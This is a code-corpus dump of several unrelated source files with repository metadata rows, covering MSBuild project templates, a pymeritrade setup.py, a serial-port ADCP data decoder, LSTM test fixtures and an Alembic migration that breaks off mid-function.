<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
%(source_filterdef)s
%(include_filterdef)s
%(resource_filterdef)s
%(python_filterdef)s
%(cython_filterdef)s
%(other_filterdef)s
</ItemGroup>
%(source_filters)s
%(include_filters)s
%(resource_filters)s
%(python_filters)s
%(cython_filters)s
%(other_filters)s
</Project>"""
props_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
</PropertyGroup>
<ItemDefinitionGroup>
<ClCompile>%(compiles_props)s%(additional_include_dirs)s
</ClCompile>
<ResourceCompile>%(resources_props)s
</ResourceCompile>
</ItemDefinitionGroup>
</Project>"""
props_debug_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
</PropertyGroup>
<ItemDefinitionGroup>
<ClCompile>%(compiles_debug_props)s%(additional_include_dirs)s
</ClCompile>
<ResourceCompile>%(resources_debug_props)s
</ResourceCompile>
</ItemDefinitionGroup>
</Project>"""
guids_template = """\
guid = '%s'
source_filterdef_guid = '%s'
include_filterdef_guid = '%s'
other_filterdef_guid = '%s'
python_filterdef_guid = '%s'
cython_filterdef_guid = '%s'
resource_filterdef_guid = '%s'
"""
num_guids = guids_template.count('%s')
#===============================================================================
# Helper Methods
#===============================================================================
def gen_guids():
t = guids_template
uuids = [
'{%s}' % str(uuid.uuid1()).upper()
for _ in range(0, num_guids)
]
return t % tuple(uuids)
#===============================================================================
# Helper Classes
#===============================================================================
# vim:set ts=8 sw=4 sts=4 tw=0 et :
| 50.166667 | 179 | 0.692848 |
import uuid
vcxproj_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGInstrument|Win32">
<Configuration>PGInstrument</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGInstrument|x64">
<Configuration>PGInstrument</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGUpdate|Win32">
<Configuration>PGUpdate</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGUpdate|x64">
<Configuration>PGUpdate</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>%(guid)s</ProjectGuid>
<RootNamespace>%(name)s</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<PropertyGroup Label="UserMacros">
<%(dirname_macro_name)s>%(dirname_macro_value)s</%(dirname_macro_name)s>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)spgupdate.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)spginstrument.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(pcbuild_prefix)s%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(name)s_debug.props" />
<Import Project="%(pcbuild_prefix)spyd_d.props" />
<Import Project="%(pcbuild_prefix)sdebug.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
<Import Project="%(pcbuild_prefix)spgupdate.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
<Import Project="%(pcbuild_prefix)spginstrument.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(name)s_debug.props" />
<Import Project="%(pcbuild_prefix)spyd_d.props" />
<Import Project="%(pcbuild_prefix)sdebug.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
%(includes)s
%(compiles)s
%(resources)s
%(others)s<ItemGroup>
<ProjectReference Include="pythoncore.vcxproj">
<Project>{cf7ac3d1-e2df-41d2-bea6-1e2556cdea26}</Project>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>"""
vcxproj_filters_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
%(source_filterdef)s
%(include_filterdef)s
%(resource_filterdef)s
%(python_filterdef)s
%(cython_filterdef)s
%(other_filterdef)s
</ItemGroup>
%(source_filters)s
%(include_filters)s
%(resource_filters)s
%(python_filters)s
%(cython_filters)s
%(other_filters)s
</Project>"""
props_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
</PropertyGroup>
<ItemDefinitionGroup>
<ClCompile>%(compiles_props)s%(additional_include_dirs)s
</ClCompile>
<ResourceCompile>%(resources_props)s
</ResourceCompile>
</ItemDefinitionGroup>
</Project>"""
props_debug_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
</PropertyGroup>
<ItemDefinitionGroup>
<ClCompile>%(compiles_debug_props)s%(additional_include_dirs)s
</ClCompile>
<ResourceCompile>%(resources_debug_props)s
</ResourceCompile>
</ItemDefinitionGroup>
</Project>"""
guids_template = """\
guid = '%s'
source_filterdef_guid = '%s'
include_filterdef_guid = '%s'
other_filterdef_guid = '%s'
python_filterdef_guid = '%s'
cython_filterdef_guid = '%s'
resource_filterdef_guid = '%s'
"""
num_guids = guids_template.count('%s')
def gen_guids():
t = guids_template
uuids = [
'{%s}' % str(uuid.uuid1()).upper()
for _ in range(0, num_guids)
]
return t % tuple(uuids)
| true | true |
f71029e3924c8dd93bfee8142465de9c95b5d32c | 742 | py | Python | setup.py | sshh12/pymeritrade | 0bb73922c8c08207cf55b934867cf780559d9871 | [
"MIT"
] | 1 | 2020-12-04T20:46:24.000Z | 2020-12-04T20:46:24.000Z | setup.py | sshh12/pymeritrade | 0bb73922c8c08207cf55b934867cf780559d9871 | [
"MIT"
] | null | null | null | setup.py | sshh12/pymeritrade | 0bb73922c8c08207cf55b934867cf780559d9871 | [
"MIT"
] | null | null | null | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
with open("requirements.txt") as f:
required = f.read().splitlines()
setuptools.setup(
name="pymeritrade",
version="0.1.4",
author="Shrivu Shankar",
author_email="shrivu1122+pymeritrade@gmail.com",
description="A Python API for TD Ameritrade.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/sshh12/pymeritrade",
packages=setuptools.find_packages(),
install_requires=required,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 25.586207 | 52 | 0.672507 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
with open("requirements.txt") as f:
required = f.read().splitlines()
setuptools.setup(
name="pymeritrade",
version="0.1.4",
author="Shrivu Shankar",
author_email="shrivu1122+pymeritrade@gmail.com",
description="A Python API for TD Ameritrade.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/sshh12/pymeritrade",
packages=setuptools.find_packages(),
install_requires=required,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| true | true |
f7102a3b2be5c1c5cc7c227eb2f94f35c34f04bc | 4,838 | py | Python | tests/test_DecodeSerialData.py | ricorx7/rti-python | 1316323b782ddb8df357e55404f507a9573e172c | [
"BSD-3-Clause"
] | 1 | 2017-06-10T13:27:44.000Z | 2017-06-10T13:27:44.000Z | tests/test_DecodeSerialData.py | ricorx7/rti-python | 1316323b782ddb8df357e55404f507a9573e172c | [
"BSD-3-Clause"
] | 10 | 2019-12-28T18:06:18.000Z | 2022-03-25T18:48:20.000Z | tests/test_DecodeSerialData.py | ricorx7/rti_python | 1316323b782ddb8df357e55404f507a9573e172c | [
"BSD-3-Clause"
] | null | null | null | import threading
import socket
import sys
import getopt
from log import logger
from Codecs.AdcpCodec import AdcpCodec
from Comm.AdcpSerialPortServer import AdcpSerialPortServer
class DecodeSerialData:
def __init__(self, tcp_port, comm_port, baud):
"""
Initialize the thread to read the data from the TCP port.
"""
self.is_alive = True
self.raw_serial_socket = None
self.serial_server_thread = None
# Create the codec
self.codec = AdcpCodec()
# Create a serial port server to read data from the
# serial port and pass it on TCP
self.serial_server = AdcpSerialPortServer(str(tcp_port),
comm_port,
baud)
# Start a tcp connection to monitor incoming data and decode
self.serial_server_thread = threading.Thread(name='AdcpDecoder', target=self.create_raw_serial_socket(tcp_port))
self.serial_server_thread.start()
def create_raw_serial_socket(self, port):
"""
Connect to the ADCP serial server. This TCP server outputs data from
the serial port. Start reading the data.
"""
try:
# Create socket
self.raw_serial_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.raw_serial_socket.connect(('localhost', int(port)))
self.raw_serial_socket.settimeout(1) # Set timeout to stop thread if terminated
# Start to read the raw data
self.read_tcp_socket()
except ConnectionRefusedError as err:
logger.error("Serial Send Socket: ", err)
exit()
except Exception as err:
logger.error('Serial Send Socket: ", Error Opening socket', err)
exit()
def read_tcp_socket(self):
"""
Read the data from the TCP port. This is the raw data from the serial port.
"""
while self.is_alive:
try:
# Read data from socket
data = self.raw_serial_socket.recv(4096)
# If data exist process
if len(data) > 0:
# Send the data received to the codec
self.codec.add(data)
except socket.timeout:
# Just a socket timeout, continue on
pass
except Exception as e:
logger.error("Exception in reading data.", e)
self.stop_adcp_server()
print("Read Thread turned off")
def stop_adcp_server(self):
"""
Stop the ADCP Serial TCP server
"""
# Stop the thread loop
self.is_alive = False
if self.serial_server is not None:
self.serial_server.close()
logger.debug("serial server stopped")
else:
logger.debug('No serial connection')
# Close the socket
self.raw_serial_socket.close()
# Stop the server thread
if self.serial_server_thread is not None:
self.serial_server_thread.join()
# Close the open file
self.close_file_write()
logger.debug("Stop the Recorder")
def main(argv):
tcp_port = "55056"
comm_port = '/dev/tty.usbserial-FT0ED8ZR'
baud = 115200
try:
opts, args = getopt.getopt(argv,"hlt:c:b:", [])
except getopt.GetoptError:
print('test_DecodeSerialData.py -t <tcp_port> -c <comm> -b <baud>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('test_DecodeSerialData.py -t <tcp_port> -c <comm> -b <baud>')
sys.exit()
elif opt in ("-l"):
print("Available Serial Ports:")
AdcpSerialPortServer.list_serial_ports()
exit()
elif opt in ('-t'):
tcp_port = arg
elif opt in ("-c"):
comm_port = arg
elif opt in ("-b"):
baud = int(arg)
# Get a list of all the serial ports available
print("Available Serial Ports:")
serial_list = AdcpSerialPortServer.list_serial_ports()
print("TCP Port: " + tcp_port)
print("Comm Port: " + comm_port)
print("Baud rate: " + str(baud))
# Verify a good serial port was given
if comm_port in serial_list:
# Run serial port
sdr = DecodeSerialData(tcp_port, comm_port, baud)
sdr.stop_adcp_server()
else:
print("----------------------------------------------------------------")
print("BAD SERIAL PORT GIVEN")
print("Please use -c to give a good serial port.")
print("-l will give you a list of all available serial ports.")
if __name__ == "__main__":
main(sys.argv[1:]) | 32.911565 | 120 | 0.564283 | import threading
import socket
import sys
import getopt
from log import logger
from Codecs.AdcpCodec import AdcpCodec
from Comm.AdcpSerialPortServer import AdcpSerialPortServer
class DecodeSerialData:
def __init__(self, tcp_port, comm_port, baud):
self.is_alive = True
self.raw_serial_socket = None
self.serial_server_thread = None
self.codec = AdcpCodec()
self.serial_server = AdcpSerialPortServer(str(tcp_port),
comm_port,
baud)
self.serial_server_thread = threading.Thread(name='AdcpDecoder', target=self.create_raw_serial_socket(tcp_port))
self.serial_server_thread.start()
def create_raw_serial_socket(self, port):
try:
self.raw_serial_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.raw_serial_socket.connect(('localhost', int(port)))
self.raw_serial_socket.settimeout(1)
self.read_tcp_socket()
except ConnectionRefusedError as err:
logger.error("Serial Send Socket: ", err)
exit()
except Exception as err:
logger.error('Serial Send Socket: ", Error Opening socket', err)
exit()
def read_tcp_socket(self):
while self.is_alive:
try:
# Read data from socket
data = self.raw_serial_socket.recv(4096)
# If data exist process
if len(data) > 0:
# Send the data received to the codec
self.codec.add(data)
except socket.timeout:
# Just a socket timeout, continue on
pass
except Exception as e:
logger.error("Exception in reading data.", e)
self.stop_adcp_server()
print("Read Thread turned off")
def stop_adcp_server(self):
# Stop the thread loop
self.is_alive = False
if self.serial_server is not None:
self.serial_server.close()
logger.debug("serial server stopped")
else:
logger.debug('No serial connection')
# Close the socket
self.raw_serial_socket.close()
# Stop the server thread
if self.serial_server_thread is not None:
self.serial_server_thread.join()
# Close the open file
self.close_file_write()
logger.debug("Stop the Recorder")
def main(argv):
tcp_port = "55056"
comm_port = '/dev/tty.usbserial-FT0ED8ZR'
baud = 115200
try:
opts, args = getopt.getopt(argv,"hlt:c:b:", [])
except getopt.GetoptError:
print('test_DecodeSerialData.py -t <tcp_port> -c <comm> -b <baud>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('test_DecodeSerialData.py -t <tcp_port> -c <comm> -b <baud>')
sys.exit()
elif opt in ("-l"):
print("Available Serial Ports:")
AdcpSerialPortServer.list_serial_ports()
exit()
elif opt in ('-t'):
tcp_port = arg
elif opt in ("-c"):
comm_port = arg
elif opt in ("-b"):
baud = int(arg)
# Get a list of all the serial ports available
print("Available Serial Ports:")
serial_list = AdcpSerialPortServer.list_serial_ports()
print("TCP Port: " + tcp_port)
print("Comm Port: " + comm_port)
print("Baud rate: " + str(baud))
# Verify a good serial port was given
if comm_port in serial_list:
# Run serial port
sdr = DecodeSerialData(tcp_port, comm_port, baud)
sdr.stop_adcp_server()
else:
print("----------------------------------------------------------------")
print("BAD SERIAL PORT GIVEN")
print("Please use -c to give a good serial port.")
print("-l will give you a list of all available serial ports.")
if __name__ == "__main__":
main(sys.argv[1:]) | true | true |
f7102bbbb5e3e0d524fd7b1d3ea685d7b17ed8f4 | 1,421 | py | Python | test/lmp/model/_lstm/conftest.py | a868111817/language-model-playground | 814ab9ca7ba7c927de39123fdb7539acd2d0e5cc | [
"Beerware"
] | 9 | 2020-07-31T10:27:28.000Z | 2021-12-23T05:58:03.000Z | test/lmp/model/_lstm/conftest.py | Aidenzich/language-model-playground | daecd4e39bbf8128b04aa236ad1d31cd22c3c1d9 | [
"Beerware"
] | 10 | 2020-07-28T05:32:52.000Z | 2022-03-04T06:36:23.000Z | test/lmp/model/_lstm/conftest.py | Aidenzich/language-model-playground | daecd4e39bbf8128b04aa236ad1d31cd22c3c1d9 | [
"Beerware"
] | 20 | 2020-07-08T07:05:39.000Z | 2021-09-22T07:20:46.000Z | r"""Setup fixtures for testing :py:class:`lmp.model.LSTMModel`."""
import pytest
import torch
from lmp.model import LSTMModel
from lmp.tknzr import BaseTknzr
@pytest.fixture
def lstm_model(
tknzr: BaseTknzr,
d_emb: int,
d_hid: int,
n_hid_lyr: int,
n_pre_hid_lyr: int,
n_post_hid_lyr: int,
p_emb: float,
p_hid: float,
) -> LSTMModel:
r"""Example ``LSTMModel`` instance."""
return LSTMModel(
d_emb=d_emb,
d_hid=d_hid,
n_hid_lyr=n_hid_lyr,
n_pre_hid_lyr=n_pre_hid_lyr,
n_post_hid_lyr=n_post_hid_lyr,
p_emb=p_emb,
p_hid=p_hid,
tknzr=tknzr,
)
@pytest.fixture
def batch_prev_tkids(lstm_model: LSTMModel) -> torch.Tensor:
r"""Example input batch of token ids."""
# Shape: (2, 3).
return torch.randint(
low=0,
high=lstm_model.emb.num_embeddings,
size=(2, 3),
)
@pytest.fixture
def batch_next_tkids(
lstm_model: LSTMModel,
batch_prev_tkids: torch.Tensor,
) -> torch.Tensor:
r"""Example target batch of token ids."""
# Same shape as `batch_prev_tkids`.
return torch.cat(
[
batch_prev_tkids[..., :-1],
torch.randint(
low=0,
high=lstm_model.emb.num_embeddings,
size=(batch_prev_tkids.shape[0], 1),
),
],
dim=1,
)
| 22.555556 | 66 | 0.581985 |
import pytest
import torch
from lmp.model import LSTMModel
from lmp.tknzr import BaseTknzr
@pytest.fixture
def lstm_model(
tknzr: BaseTknzr,
d_emb: int,
d_hid: int,
n_hid_lyr: int,
n_pre_hid_lyr: int,
n_post_hid_lyr: int,
p_emb: float,
p_hid: float,
) -> LSTMModel:
return LSTMModel(
d_emb=d_emb,
d_hid=d_hid,
n_hid_lyr=n_hid_lyr,
n_pre_hid_lyr=n_pre_hid_lyr,
n_post_hid_lyr=n_post_hid_lyr,
p_emb=p_emb,
p_hid=p_hid,
tknzr=tknzr,
)
@pytest.fixture
def batch_prev_tkids(lstm_model: LSTMModel) -> torch.Tensor:
return torch.randint(
low=0,
high=lstm_model.emb.num_embeddings,
size=(2, 3),
)
@pytest.fixture
def batch_next_tkids(
lstm_model: LSTMModel,
batch_prev_tkids: torch.Tensor,
) -> torch.Tensor:
return torch.cat(
[
batch_prev_tkids[..., :-1],
torch.randint(
low=0,
high=lstm_model.emb.num_embeddings,
size=(batch_prev_tkids.shape[0], 1),
),
],
dim=1,
)
| true | true |
f7102c3ab6bd0cb874396d2b18df2dc4e19d5326 | 733 | py | Python | backend/databasemodel/alembic/versions/b4eea63fd165_add_cityname_indexes_for_filtering.py | GispoCoding/tarmo | 064eead90991fb2836173b647282e044dfa06c5a | [
"MIT"
] | null | null | null | backend/databasemodel/alembic/versions/b4eea63fd165_add_cityname_indexes_for_filtering.py | GispoCoding/tarmo | 064eead90991fb2836173b647282e044dfa06c5a | [
"MIT"
] | 92 | 2022-01-27T08:05:09.000Z | 2022-03-31T06:54:46.000Z | backend/databasemodel/alembic/versions/b4eea63fd165_add_cityname_indexes_for_filtering.py | GispoCoding/tarmo | 064eead90991fb2836173b647282e044dfa06c5a | [
"MIT"
] | null | null | null | """add cityname indexes for filtering
Revision ID: b4eea63fd165
Revises: 850af1d21f5e
Create Date: 2022-05-05 17:39:57.826059
"""
import os
from alembic import op
here = os.path.dirname(os.path.realpath(__file__))
# revision identifiers, used by Alembic.
revision = "b4eea63fd165"
down_revision = "850af1d21f5e"
branch_labels = None
depends_on = None
revision_dir = f"{here}/{revision}"
# idea from https://github.com/tbobm/alembic-sequeled
def process_migration(script_name: str):
filename = f"{revision_dir}/{script_name}.sql"
query = "\n".join(open(filename))
if len(query) > 0:
op.execute(query)
def upgrade():
process_migration("upgrade")
def downgrade():
process_migration("downgrade")
| 19.289474 | 53 | 0.723056 | import os
from alembic import op
here = os.path.dirname(os.path.realpath(__file__))
revision = "b4eea63fd165"
down_revision = "850af1d21f5e"
branch_labels = None
depends_on = None
revision_dir = f"{here}/{revision}"
def process_migration(script_name: str):
